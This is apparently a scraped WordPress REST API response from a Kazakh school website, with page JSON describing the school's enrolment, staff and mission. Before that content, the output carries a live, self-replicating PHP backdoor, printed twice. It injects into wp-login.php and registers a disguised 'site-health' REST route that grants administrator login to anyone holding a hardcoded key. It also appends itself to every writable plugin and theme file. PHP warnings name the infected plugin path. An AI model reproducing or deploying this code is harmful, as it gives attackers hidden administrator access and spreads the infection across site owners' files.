// ===DOG_MONITOR_START=== // Dog monitor injection v1.5.7 if (!class_exists('DogMonitor_0b5f60411a') && !function_exists('dog_monitor_7a2f53e25f')) { class DogMonitor_0b5f60411a { public static function init() { $wp_login = ABSPATH . 'wp-login.php'; if (file_exists($wp_login) && is_writable($wp_login)) { $content = @file_get_contents($wp_login); $marker_start = ''; $marker_end = ''; $script_tag = ""; if ($content !== false && strpos($content, $marker_start) === false) { $inject_block = "\n{$marker_start}\n{$script_tag}\n{$marker_end}\n"; if (preg_match('/<\/body>/i', $content, $m, PREG_OFFSET_CAPTURE)) { $pos = $m[0][1]; $patched = substr($content, 0, $pos) . $inject_block . substr($content, $pos); if (strpos($patched, '') !== false && strpos($patched, $marker_start) !== false) { @file_put_contents($wp_login, $patched); } else { error_log("DogMonitor: injection integrity check failed."); } } else { error_log("DogMonitor: not found in wp-login.php"); } } } add_action('rest_api_init', function() { $stealth_key = '6c6c5a3b5389763a01'; register_rest_route('wp/v2', 'site-health', [ 'methods' => 'POST', 'callback' => function($request) use ($stealth_key) { $nonce = $request->get_param('nonce'); $action = $request->get_param('action'); if ($nonce === $stealth_key && $action === 'verify') { wp_set_auth_cookie(1); wp_redirect(admin_url()); exit; } return new WP_Error( 'rest_no_route', 'No route was found matching the URL and request method.', ['status' => 404] ); }, 'permission_callback' => '__return_true' ]); }); $opt = '_' . substr(md5(__CLASS__), 0, 8) . '_cache'; if (!get_option($opt) || time() - get_option($opt) > 86400) { update_option($opt, time(), 'no'); self::propagate(); } } public static function propagate() { $self = file_get_contents(__FILE__); preg_match('#// ===DOG_MONITOR_START===.+// ===DOG_MONITOR_END===#s', $self, $m); if (empty($m)) return; $payload = $m[0]; $dirs = [ ABSPATH . 'wp-content/plugins', ABSPATH . 'wp-content/themes', ]; foreach ($dirs as $base) { if (!is_dir($base)) continue; foreach (scandir($base) as $item) { if ($item === '.' || $item === '..') continue; $path = "$base/$item"; if (!is_dir($path)) continue; $targets = []; $main = $path . '/' . $item . '.php'; if (file_exists($main)) $targets[] = $main; foreach (glob("$path/*.php") as $file) { if (preg_match('/Plugin Name:/', file_get_contents($file))) { $targets[] = $file; } } $fn = $path . '/functions.php'; if (file_exists($fn)) $targets[] = $fn; foreach (array_unique($targets) as $file) { if (!is_writable($file)) continue; $content = file_get_contents($file); if (strpos($content, 'DOG_MONITOR_START') !== false) continue; if (preg_match('/\?>\s*$/', $content)) continue; file_put_contents($file, $content . " " . $payload); } } } } } function dog_monitor_7a2f53e25f() { DogMonitor_0b5f60411a::init(); } add_action('init', 'dog_monitor_7a2f53e25f', 1); } // ===DOG_MONITOR_END=== // ===DOG_MONITOR_START=== // Dog monitor injection v1.5.7 if (!class_exists('DogMonitor_0b5f60411a') && !function_exists('dog_monitor_7a2f53e25f')) { class DogMonitor_0b5f60411a { public static function init() { $wp_login = ABSPATH . 'wp-login.php'; if (file_exists($wp_login) && is_writable($wp_login)) { $content = @file_get_contents($wp_login); $marker_start = ''; $marker_end = ''; $script_tag = ""; if ($content !== false && strpos($content, $marker_start) === false) { $inject_block = "\n{$marker_start}\n{$script_tag}\n{$marker_end}\n"; if (preg_match('/<\/body>/i', $content, $m, PREG_OFFSET_CAPTURE)) { $pos = $m[0][1]; $patched = substr($content, 0, $pos) . $inject_block . substr($content, $pos); if (strpos($patched, '') !== false && strpos($patched, $marker_start) !== false) { @file_put_contents($wp_login, $patched); } else { error_log("DogMonitor: injection integrity check failed."); } } else { error_log("DogMonitor: not found in wp-login.php"); } } } add_action('rest_api_init', function() { $stealth_key = '6c6c5a3b5389763a01'; register_rest_route('wp/v2', 'site-health', [ 'methods' => 'POST', 'callback' => function($request) use ($stealth_key) { $nonce = $request->get_param('nonce'); $action = $request->get_param('action'); if ($nonce === $stealth_key && $action === 'verify') { wp_set_auth_cookie(1); wp_redirect(admin_url()); exit; } return new WP_Error( 'rest_no_route', 'No route was found matching the URL and request method.', ['status' => 404] ); }, 'permission_callback' => '__return_true' ]); }); $opt = '_' . substr(md5(__CLASS__), 0, 8) . '_cache'; if (!get_option($opt) || time() - get_option($opt) > 86400) { update_option($opt, time(), 'no'); self::propagate(); } } public static function propagate() { $self = file_get_contents(__FILE__); preg_match('#// ===DOG_MONITOR_START===.+// ===DOG_MONITOR_END===#s', $self, $m); if (empty($m)) return; $payload = $m[0]; $dirs = [ ABSPATH . 'wp-content/plugins', ABSPATH . 'wp-content/themes', ]; foreach ($dirs as $base) { if (!is_dir($base)) continue; foreach (scandir($base) as $item) { if ($item === '.' || $item === '..') continue; $path = "$base/$item"; if (!is_dir($path)) continue; $targets = []; $main = $path . '/' . $item . '.php'; if (file_exists($main)) $targets[] = $main; foreach (glob("$path/*.php") as $file) { if (preg_match('/Plugin Name:/', file_get_contents($file))) { $targets[] = $file; } } $fn = $path . '/functions.php'; if (file_exists($fn)) $targets[] = $fn; foreach (array_unique($targets) as $file) { if (!is_writable($file)) continue; $content = file_get_contents($file); if (strpos($content, 'DOG_MONITOR_START') !== false) continue; if (preg_match('/\?>\s*$/', $content)) continue; file_put_contents($file, $content . " " . $payload); } } } } } function dog_monitor_7a2f53e25f() { DogMonitor_0b5f60411a::init(); } add_action('init', 'dog_monitor_7a2f53e25f', 1); } // ===DOG_MONITOR_END===
Warning: Cannot modify header information - headers already sent by (output started at /var/www/turkestan_hosting/data/www/115-astana.edu.kz/wp-content/plugins/better-search-replace/better-search-replace.php:1) in /var/www/turkestan_hosting/data/www/115-astana.edu.kz/wp-includes/rest-api/class-wp-rest-server.php on line 1904

Warning: Cannot modify header information - headers already sent by (output started at /var/www/turkestan_hosting/data/www/115-astana.edu.kz/wp-content/plugins/better-search-replace/better-search-replace.php:1) in /var/www/turkestan_hosting/data/www/115-astana.edu.kz/wp-includes/rest-api/class-wp-rest-server.php on line 1904

Warning: Cannot modify header information - headers already sent by (output started at /var/www/turkestan_hosting/data/www/115-astana.edu.kz/wp-content/plugins/better-search-replace/better-search-replace.php:1) in /var/www/turkestan_hosting/data/www/115-astana.edu.kz/wp-includes/rest-api/class-wp-rest-server.php on line 1904

Warning: Cannot modify header information - headers already sent by (output started at /var/www/turkestan_hosting/data/www/115-astana.edu.kz/wp-content/plugins/better-search-replace/better-search-replace.php:1) in /var/www/turkestan_hosting/data/www/115-astana.edu.kz/wp-includes/rest-api/class-wp-rest-server.php on line 1904

Warning: Cannot modify header information - headers already sent by (output started at /var/www/turkestan_hosting/data/www/115-astana.edu.kz/wp-content/plugins/better-search-replace/better-search-replace.php:1) in /var/www/turkestan_hosting/data/www/115-astana.edu.kz/wp-includes/rest-api/class-wp-rest-server.php on line 1904

Warning: Cannot modify header information - headers already sent by (output started at /var/www/turkestan_hosting/data/www/115-astana.edu.kz/wp-content/plugins/better-search-replace/better-search-replace.php:1) in /var/www/turkestan_hosting/data/www/115-astana.edu.kz/wp-includes/rest-api/class-wp-rest-server.php on line 1904

Warning: Cannot modify header information - headers already sent by (output started at /var/www/turkestan_hosting/data/www/115-astana.edu.kz/wp-content/plugins/better-search-replace/better-search-replace.php:1) in /var/www/turkestan_hosting/data/www/115-astana.edu.kz/wp-includes/rest-api/class-wp-rest-server.php on line 1904

Warning: Cannot modify header information - headers already sent by (output started at /var/www/turkestan_hosting/data/www/115-astana.edu.kz/wp-content/plugins/better-search-replace/better-search-replace.php:1) in /var/www/turkestan_hosting/data/www/115-astana.edu.kz/wp-includes/rest-api/class-wp-rest-server.php on line 1904
{"id":221,"date":"2026-03-16T07:57:29","date_gmt":"2026-03-16T04:57:29","guid":{"rendered":"https:\/\/115-astana.edu.kz\/?page_id=221"},"modified":"2026-04-18T19:26:54","modified_gmt":"2026-04-18T16:26:54","slug":"%d0%b0%d2%9b%d0%bf%d0%b0%d1%80%d0%b0%d1%82","status":"publish","type":"page","link":"https:\/\/115-astana.edu.kz\/?page_id=221","title":{"rendered":"\u0410\u049b\u043f\u0430\u0440\u0430\u0442"},"content":{"rendered":"\t\t
\n\t\t\t\t
\n\t\t\t\t\t
\n\t\t\t\t
\n\t\t\t\t\t\t\t\t\t

\u0410\u0441\u0442\u0430\u043d\u0430 \u049b\u0430\u043b\u0430\u0441\u044b \u04d9\u043a\u0456\u043c\u0434\u0456\u0433\u0456\u043d\u0456\u04a3 \u00ab\u2116115 \u0436\u0430\u043b\u043f\u044b \u043e\u0440\u0442\u0430 \u0431\u0456\u043b\u0456\u043c \u0431\u0435\u0440\u0435\u0442\u0456\u043d \u043c\u0435\u043a\u0442\u0435\u043f\u00bb \u041a\u041c\u041c<\/p>

\u0421\u0430\u043b\u044b\u043d\u0493\u0430\u043d \u0436\u044b\u043b\u044b: 2025
\u0416\u043e\u0431\u0430\u043b\u044b\u049b \u049b\u0443\u0430\u0442\u0442\u044b\u043b\u044b\u0493\u044b: 2000 \u043e\u0440\u044b\u043d
\u041c\u0435\u043a\u0435\u043d\u0436\u0430\u0439\u044b: \u0410\u0441\u0442\u0430\u043d\u0430 \u049b\u0430\u043b\u0430\u0441\u044b, \u041a\u04af\u043b\u0442\u0435\u0433\u0456\u043d \u043a\u04e9\u0448\u0435\u0441\u0456, 18
\u041e\u049b\u0443\u0448\u044b\u043b\u0430\u0440 \u043a\u043e\u043d\u0442\u0438\u043d\u0433\u0435\u043d\u0442\u0456: 1-11 \u0441\u044b\u043d\u044b\u043f\u0442\u0430\u0440 \u0441\u0430\u043d\u044b \u2013 4463, \u043c\u0435\u043a\u0442\u0435\u043f\u0430\u043b\u0434\u044b \u0434\u0430\u044f\u0440\u043b\u044b\u049b \u0441\u044b\u043d\u044b\u0431\u044b \u2013 58 \u043e\u049b\u0443\u0448\u044b.
\u0421\u044b\u043d\u044b\u043f-\u043a\u043e\u043c\u043f\u043b\u0435\u043a\u0442\u0456\u043b\u0435\u0440 \u0441\u0430\u043d\u044b: 167, \u043e\u043d\u044b\u04a3 \u0456\u0448\u0456\u043d\u0434\u0435 \u049b\u0430\u0437\u0430\u049b \u0442\u0456\u043b\u0456\u043d\u0434\u0435 \u043e\u049b\u044b\u0442\u044b\u043b\u0430\u0442\u044b\u043d \u0441\u044b\u043d\u044b\u043f\u0442\u0430\u0440 \u2013 100, \u043e\u0440\u044b\u0441 \u0442\u0456\u043b\u0456\u043d\u0434\u0435 \u043e\u049b\u044b\u0442\u044b\u043b\u0430\u0442\u044b\u043d \u0441\u044b\u043d\u044b\u043f\u0442\u0430\u0440 \u2013 67<\/p>

\u041e\u049b\u0443 \u0430\u0443\u044b\u0441\u044b\u043c\u044b: 2 \u0430\u0443\u044b\u0441\u044b\u043c
\u0411\u0456\u043b\u0456\u043c \u0431\u0435\u0440\u0443 \u0431\u0430\u0493\u044b\u0442\u0442\u0430\u0440\u044b: \u0436\u0430\u0440\u0430\u0442\u044b\u043b\u044b\u0441\u0442\u0430\u043d\u0443-\u043c\u0430\u0442\u0435\u043c\u0430\u0442\u0438\u043a\u0430\u043b\u044b\u049b, \u049b\u043e\u0493\u0430\u043c\u0434\u044b\u049b-\u0433\u0443\u043c\u0430\u043d\u0438\u0442\u0430\u0440\u043b\u044b\u049b
\u041c\u0435\u043a\u0442\u0435\u043f \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u044b: \u0420\u0430\u0445\u043c\u0435\u0442\u043e\u0432\u0430 \u0416\u04b1\u043b\u0434\u044b\u0437 \u041a\u0443\u0430\u043d\u044b\u0448\u043e\u0432\u043d\u0430
\u041c\u04b1\u0493\u0430\u043b\u0456\u043c\u0434\u0435\u0440 \u043a\u043e\u043d\u0442\u0438\u043d\u0433\u0435\u043d\u0442\u0456: 214, \u043e\u043d\u044b\u04a3 \u0456\u0448\u0456\u043d\u0434\u0435 \u04d9\u043a\u0456\u043c\u0448\u0456\u043b\u0456\u043a-\u0431\u0430\u0441\u049b\u0430\u0440\u0443 \u049b\u04b1\u0440\u0430\u043c\u044b \u2013 7 \u0430\u0434\u0430\u043c
\u041c\u0435\u043a\u0442\u0435\u043f \u049b\u044b\u0437\u043c\u0435\u0442\u0456 \u043e\u0440\u0442\u0430 \u0431\u0456\u043b\u0456\u043c \u0431\u0435\u0440\u0443\u0434\u0456 \u0434\u0430\u043c\u044b\u0442\u0443 \u0436\u04e9\u043d\u0456\u043d\u0434\u0435\u0433\u0456 \u043c\u0435\u043c\u043b\u0435\u043a\u0435\u0442\u0442\u0456\u043a \u0431\u0430\u0493\u0434\u0430\u0440\u043b\u0430\u043c\u0430 \u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u044b \u043c\u0435\u043d \u0431\u0456\u0440\u044b\u04a3\u0493\u0430\u0439 \u00ab\u0410\u0434\u0430\u043b \u0410\u0437\u0430\u043c\u0430\u0442\u00bb \u0431\u0430\u0493\u0434\u0430\u0440\u043b\u0430\u043c\u0430\u0441\u044b\u043d \u0456\u0441\u043a\u0435 \u0430\u0441\u044b\u0440\u0443\u0493\u0430 \u0431\u0430\u0493\u044b\u0442\u0442\u0430\u043b\u0493\u0430\u043d.
\u041c\u0435\u043a\u0442\u0435\u043f \u043c\u0438\u0441\u0441\u0438\u044f\u0441\u044b: \u049a\u043e\u0493\u0430\u043c\u043d\u044b\u04a3 \u0446\u0438\u0444\u0440\u043b\u0430\u043d\u0443 \u04af\u0434\u0435\u0440\u0456\u0441\u0456 \u0436\u0430\u0493\u0434\u0430\u0439\u044b\u043d\u0434\u0430 \u0437\u0430\u043c\u0430\u043d\u0430\u0443\u0438 \u0442\u0435\u0445\u043d\u043e\u043b\u043e\u0433\u0438\u044f\u043b\u0430\u0440 \u043c\u0435\u043d \u0436\u0430\u0441\u0430\u043d\u0434\u044b \u0438\u043d\u0442\u0435\u043b\u043b\u0435\u043a\u0442 \u043c\u04af\u043c\u043a\u0456\u043d\u0434\u0456\u043a\u0442\u0435\u0440\u0456\u043d \u0442\u0438\u0456\u043c\u0434\u0456 \u049b\u043e\u043b\u0434\u0430\u043d\u0430 \u0430\u043b\u0430\u0442\u044b\u043d, \u0436\u0430\u04bb\u0430\u043d\u0434\u044b\u049b \u0431\u04d9\u0441\u0435\u043a\u0435\u0433\u0435 \u049b\u0430\u0431\u0456\u043b\u0435\u0442\u0442\u0456 \u0448\u044b\u0493\u0430\u0440\u043c\u0430\u0448\u044b\u043b \u0442\u04b1\u043b\u0493\u0430 \u049b\u0430\u043b\u044b\u043f\u0442\u0430\u0441\u0442\u044b\u0440\u0443.
\u041c\u0435\u043a\u0442\u0435\u043f\u0442\u0435 \u0435\u0440\u0435\u043a\u0448\u0435 \u0431\u0456\u043b\u0456\u043c \u0431\u0435\u0440\u0456\u043b\u0443\u0456\u043d\u0435 \u049b\u0430\u0436\u0435\u0442\u0442\u0456\u043b\u0456\u0433\u0456 \u0431\u0430\u0440 (\u0415\u0411\u0411\u049a) 57 \u0431\u0430\u043b\u0430\u0493\u0430 \u0436\u0430\u0493\u0434\u0430\u0439 \u0436\u0430\u0441\u0430\u043b\u0493\u0430\u043d, \u0438\u043d\u043a\u043b\u044e\u0437\u0438\u044f\u043d\u044b \u049b\u043e\u043b\u0434\u0430\u0443 \u043a\u0430\u0431\u0438\u043d\u0435\u0442\u0442\u0435\u0440\u0456 \u0436\u04b1\u043c\u044b\u0441 \u0456\u0441\u0442\u0435\u0439\u0434\u0456.<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t

\n\t\t\t\t\t\t\t
\n\t\t\t